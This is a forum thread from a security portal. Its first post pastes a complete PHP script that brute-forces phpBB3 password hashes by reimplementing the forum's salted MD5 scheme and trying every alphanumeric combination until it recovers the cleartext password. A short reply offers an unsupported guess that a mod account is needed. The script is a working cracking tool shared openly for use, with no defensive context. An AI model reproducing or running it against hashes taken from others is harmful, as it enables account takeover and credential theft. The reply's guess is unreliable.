|
Menu |
|
|
Home |
| |
|
Discussions |
| |
|
Tools |
| |
|
Affiliates |
| |
|
Content |
| |
|
Info |
| | |
|
|
|
|
|
User Info |
|
Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 158
Members: 0
Total: 158
|
|
|
|
|
|
Full disclosure |
|
|
|
|
|
|
|
|
|
IT Security and Insecurity Portal |
|
|
PHP, phpbb3 bruteforcer.. |
|
Posted: Mon Mar 23, 2009 1:43 am |
|
|
MrMe |
Regular user |
|
|
Joined: Mar 23, 2009 |
Posts: 6 |
|
|
|
|
|
|
|
Code: | #!/usr/bin/php
<?php
set_time_limit(0);
echo "///////////////////////////////////////////////\r\n";
echo "// PHPBB3 Bruteforce //\r\n";
echo "// Original bruteforce script by Tux //\r\n";
echo "// Moded for Phpbb3 by Jeforce //\r\n";
echo "// http://www.jeforce.net //\r\n";
echo "////////////////////////////////////////////\r\n";
if ($argc<2 || $argv[1]=='--help') {
echo<<<END
USAGE: {$argv[0]} 'hash' chars
- hash : The hash to crack
- chars : Max length string to attempt to crack
HELP: {$argv[0]} --help
END;
exit;
}
//Fonction PHPBB3
function _hash_crypt_private($password, $setting, &$itoa64)
{
$output = '*';
// Check for correct hash
if (substr($setting, 0, 3) != '$H$')
{return $output;}
$count_log2 = strpos($itoa64, $setting[3]);
if ($count_log2 < 7 || $count_log2 > 30)
{return $output;}
$count = 1 << $count_log2;
$salt = substr($setting, 4, 8);
if (strlen($salt) != 8)
{return $output;}
$hash = pack('H*', md5($salt . $password));
do
{
$hash = pack('H*', md5($hash . $password));
}
while (--$count);
$output = substr($setting, 0, 12);
$output .= _hash_encode64($hash, 16, $itoa64);
return $output;
}
function _hash_gensalt_private($input, &$itoa64, $iteration_count_log2 = 6)
{
if ($iteration_count_log2 < 4 || $iteration_count_log2 > 31)
{$iteration_count_log2 = 8;}
$output = '$H$';
$output .= $itoa64[min($iteration_count_log2 + ((PHP_VERSION >= 5) ? 5 : 3), 30)];
$output .= _hash_encode64($input, 6, $itoa64);
return $output;
}
/**
* Encode hash
*/
function _hash_encode64($input, $count, &$itoa64)
{
$output = '';
$i = 0;
do
{
$value = ord($input[$i++]);
$output .= $itoa64[$value & 0x3f];
if ($i < $count)
{$value |= ord($input[$i]) << 8;}
$output .= $itoa64[($value >> 6) & 0x3f];
if ($i++ >= $count)
{break;}
if ($i < $count)
{$value |= ord($input[$i]) << 16;}
$output .= $itoa64[($value >> 12) & 0x3f];
if ($i++ >= $count)
{break;}
$output .= $itoa64[($value >> 18) & 0x3f];
}
while ($i < $count);
return $output;
}
function phpbb_check_hash($password, $hash)
{
$itoa64 = './0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz';
if (strlen($hash) == 34)
{
return (_hash_crypt_private($password, $hash, $itoa64) === $hash) ? true : false;
}
return (md5($password) === $hash) ? true : false;
}
//if(isset($argv[4])) $charset=$argv[4];
//else $charset = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';
$charset = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';
$charset_beginning = $charset{0};
$charset_end = $charset{strlen($charset)-1};
//$HASH = '$H$99i1.eNyzhGdi5/lAnKnSjU8iIABC80';
// $SIZE = (int) $_GET['chars'];
$HASH = $argv[1];
$SIZE = (int) $argv[2];
$start = time()-1;
$curtotal=0;
$total=0;
for($i=$SIZE; $i>0; $i--) $total+=pow(strlen($charset), $i);
$split=ceil(($total/strlen($charset))/5);
echo " *** MAX SIZE: $SIZE, cracking HASH: $HASH\r\n";
echo " *** TOTAL KEYS: $total\r\n";
echo " *** CHARSET: $charset\r\n";
for($i=1; $i<=$SIZE; $i++) {
$keyspace = pow(strlen($charset), $i);
echo "\r\nAttempting to crack with $i characters.\r\n";
echo " *** Total combinations: $keyspace\r\n";
$key = '';
for ($y=0; $y<$i; $y++) $key .= $charset_beginning;
for ($x=0; $x<$keyspace+1; $x++) {
$curtotal++;
if (phpbb_check_hash($key, $HASH)) {
$time=(time()-$start);
echo<<<END
Successfully key cracked after $time seconds. The cracker searched a total
of $curtotal keys out of a possible $total in $time seconds.
Found the clear text of '$HASH' is '$key'.\n
END;
exit;
}
if($x%$split == 0) {
$rate=ceil($curtotal/(time()-$start));
echo " ... $curtotal/$total ($key) [$rate Keys/second]\r\n";
}
for ($y=0; $y<$i; $y++) {
if ($key[$y] != $charset_end) {
$key[$y] = $charset{strpos($charset, $key[$y])+1};
if ($y > 0) for ($z = 0; $z < $y; $z++) $key[$z] = $charset_beginning;
break;
}
}
}
}
$time=time()-$start;
echo<<<END
*** SORRY NO MATCHS FOUND
Time running : $time. Keys searched : $total.\n
END;
?> |
For so far no luck to me.. Might i do it wrong! ..
Anyone else know how to use this one correctly?! |
|
|
|
|
|
|
|
|
Posted: Sun Nov 20, 2011 4:37 pm |
|
|
Angel91 |
Beginner |
|
|
Joined: Nov 20, 2011 |
Posts: 1 |
|
|
|
|
|
|
|
I think for this one to work you need a mod account... Or something like that.. not sure ._. |
|
|
|
|
www.waraxe.us Forum Index -> PhpBB
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|